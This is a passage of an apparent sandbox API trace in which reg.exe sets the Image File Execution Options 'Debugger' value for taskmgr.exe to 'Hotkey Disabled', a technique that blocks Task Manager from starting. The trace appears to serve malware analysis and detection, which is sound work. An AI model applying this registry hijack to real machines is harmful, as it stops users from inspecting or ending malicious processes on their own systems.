(_Buf1=0x3bb6c0, _Buf2=0xff711458, _Size=0x7) returned 0 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.158] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x1e) returned 0x3b5c70 [0240.158] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0240.158] GetProcessHeap () returned 0x3a0000 [0240.158] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x18) returned 0x3bb6e0 [0240.158] _memicmp (_Buf1=0x3bb6e0, _Buf2=0xff711458, _Size=0x7) returned 0 [0240.158] GetProcessHeap () returned 0x3a0000 [0240.158] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0xbc) returned 0x3bb860 [0240.158] _vsnwprintf (in: _Buffer=0x3b5c70, _BufferCount=0xe, _Format="|%s|", _ArgList=0x28fac8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0240.158] _vsnwprintf (in: _Buffer=0x3bb860, _BufferCount=0x5d, _Format="|%s|", _ArgList=0x28fac8 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe|") returned 92 [0240.158] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0240.158] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe|") returned 92 [0240.158] SetLastError (dwErrCode=0x490) [0240.158] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0240.158] GetProcessHeap () returned 0x3a0000 [0240.158] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0xb6) returned 0x3bb930 [0240.158] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0240.158] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.159] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0240.159] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.160] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.160] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0240.160] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.161] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0240.161] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.161] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0240.161] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0240.162] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0240.162] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0240.162] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0240.163] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0240.163] GetProcessHeap () returned 0x3a0000 [0240.163] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x28) returned 0x3b5ca0 [0240.163] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0240.163] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0240.163] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0240.163] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0240.163] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0240.163] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0240.163] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.163] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.163] StrChrIW (lpStart="Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.163] StrChrIW (lpStart="Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.163] StrChrIW (lpStart="CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Image File Execution Options\\taskmgr.exe" [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.163] StrChrIW (lpStart="Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\taskmgr.exe" [0240.163] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.164] StrChrIW (lpStart="taskmgr.exe", wMatch=0x5c) returned 0x0 [0240.164] SetLastError (dwErrCode=0x490) [0240.164] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.164] SetLastError (dwErrCode=0x0) [0240.164] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0xac) returned 0x3bbbe0 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0xd8) returned 0x3bbca0 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5ca0) returned 1 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5ca0) returned 0x28 [0240.164] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5ca0 | out: hHeap=0x3a0000) returned 1 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb930) returned 1 [0240.164] GetProcessHeap () returned 0x3a0000 [0240.164] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb930) returned 0xb6 [0240.164] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb930 | out: hHeap=0x3a0000) returned 1 [0240.164] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0240.164] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0240.165] lstrlenW (lpString="Debugger") returned 8 [0240.165] GetProcessHeap () returned 0x3a0000 [0240.165] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x12) returned 0x3bb700 [0240.165] lstrlenW (lpString="Debugger") returned 8 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.165] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0240.165] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0240.166] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0240.166] lstrlenW (lpString="REG_SZ") returned 6 [0240.166] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0240.166] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0240.166] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0240.166] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0240.166] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0240.166] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0240.166] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0240.166] LocalFree (hMem=0x3bb930) returned 0x0 [0240.166] SetLastError (dwErrCode=0x0) [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0240.166] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0240.166] lstrlenW (lpString="Hotkey Disabled") returned 15 [0240.166] GetProcessHeap () returned 0x3a0000 [0240.166] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5ca0 [0240.166] SetLastError (dwErrCode=0x0) [0240.167] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x28fba0, lpdwDisposition=0x28fbc0 | out: phkResult=0x28fba0*=0x54, lpdwDisposition=0x28fbc0*=0x1) returned 0x0 [0240.167] RegQueryValueExW (in: hKey=0x54, lpValueName="Debugger", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0240.167] lstrlenW (lpString="Hotkey Disabled") returned 15 [0240.167] RegSetValueExW (in: hKey=0x54, lpValueName="Debugger", Reserved=0x0, dwType=0x1, lpData="Hotkey Disabled", cbData=0x20 | out: lpData="Hotkey Disabled") returned 0x0 [0240.168] RegCloseKey (hKey=0x54) returned 0x0 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbbe0) returned 1 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bbbe0) returned 0xac [0240.168] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbbe0 | out: hHeap=0x3a0000) returned 1 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbca0) returned 1 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bbca0) returned 0xd8 [0240.168] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbca0 | out: hHeap=0x3a0000) returned 1 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb700) returned 1 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb700) returned 0x12 [0240.168] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb700 | out: hHeap=0x3a0000) returned 1 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5ca0) returned 1 [0240.168] GetProcessHeap () returned 0x3a0000 [0240.168] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5ca0) returned 0x20 [0240.168] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5ca0 | out: hHeap=0x3a0000) returned 1 [0240.168] SetLastError (dwErrCode=0x0) [0240.168] GetLastError () returned 0x0 [0240.168] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x28fb20, nSize=0x0, Arguments=0x0 | out: lpBuffer="뤰;") returned 0x27 [0240.169] GetLastError () returned 0x0 [0240.169] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0240.169] GetProcessHeap () returned 0x3a0000 [0240.169] GetProcessHeap () returned 0x3a0000 [0240.169] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb640) returned 1 [0240.169] GetProcessHeap () returned 0x3a0000 [0240.169] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb640) returned 0x2 [0240.170] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb640 | out: hHeap=0x3a0000) returned 1 [0240.170] GetProcessHeap () returned 0x3a0000 [0240.170] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x50) returned 0x3bb990 [0240.170] SetLastError (dwErrCode=0x0) [0240.170] LocalFree (hMem=0x3bb930) returned 0x0 [0240.170] __iob_func () returned 0x7fefdf72a80 [0240.170] _fileno (_File=0x7fefdf72ab0) returned 1 [0240.170] _errno () returned 0x174bb0 [0240.170] _get_osfhandle (_FileHandle=1) returned 0x10c [0240.170] _errno () returned 0x174bb0 [0240.170] GetFileType (hFile=0x10c) returned 0x3 [0240.170] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0240.170] GetConsoleOutputCP () returned 0x1b5 [0240.170] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0240.170] GetConsoleOutputCP () returned 0x1b5 [0240.170] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0xff722710, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The operation completed successfully.\r\n", lpUsedDefaultChar=0x0) returned 39 [0240.170] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 39 [0240.171] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0240.171] GetProcessHeap () returned 0x3a0000 [0240.171] GetProcessHeap () returned 0x3a0000 [0240.171] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb860) returned 1 [0240.171] GetProcessHeap () returned 0x3a0000 [0240.171] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb860) returned 0xbc [0240.171] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb860 | out: hHeap=0x3a0000) returned 1 [0240.171] GetProcessHeap () returned 0x3a0000 [0240.171] GetProcessHeap () returned 0x3a0000 [0240.171] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb6e0) returned 1 [0240.171] GetProcessHeap () returned 0x3a0000 [0240.171] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb6e0) returned 0x18 [0240.172] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb6e0 | out: hHeap=0x3a0000) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5be0) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5be0) returned 0x20 [0240.172] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5be0 | out: hHeap=0x3a0000) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5c70) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5c70) returned 0x1e [0240.172] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5c70 | out: hHeap=0x3a0000) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb6c0) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb6c0) returned 0x18 [0240.172] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb6c0 | out: hHeap=0x3a0000) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5bb0) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, 